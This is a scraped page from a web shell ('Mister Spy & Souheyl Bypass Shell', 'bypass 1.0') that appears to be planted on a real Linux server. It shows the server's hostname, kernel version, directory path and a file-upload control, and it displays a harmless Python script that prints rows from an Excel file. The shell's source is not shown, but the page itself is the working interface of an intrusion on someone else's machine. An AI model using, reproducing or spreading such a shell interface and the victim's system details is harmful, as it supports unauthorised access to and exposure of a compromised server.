Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /proc/thread-self/root/home/ift/52_procpy/dataninja/test/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/ift/52_procpy/dataninja/test/xlsdb.py

#  coding: utf8

import os,re,sys
import procpy
import procpy.xlsdb


#**************************************************************************

class Xlsdb (object):

    def __init__ (self,*pars):
        
        self.__class__.__dict__[pars[0]](self,*pars[1:])

#**************************************************************************        

    def read_excel (self,*pars):
    
        print(pars)
        xls = procpy.xlsdb.Xlsdb(re.sub(r"^(.*\/)(.*)$","\\1",__file__)+pars[0])
        xls.open()
        
        xls.colnames = next(xls)
        while (0 == 0):
            o = next(xls)
            if not o:
                return()
            for o1 in o:
                print(o1, str(o[o1]).encode("utf8"))
            print("")
            print("")


        
#**************************************************************************        

if __name__ == "__main__":
    
    Xlsdb(*tuple(sys.argv[1:]))

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net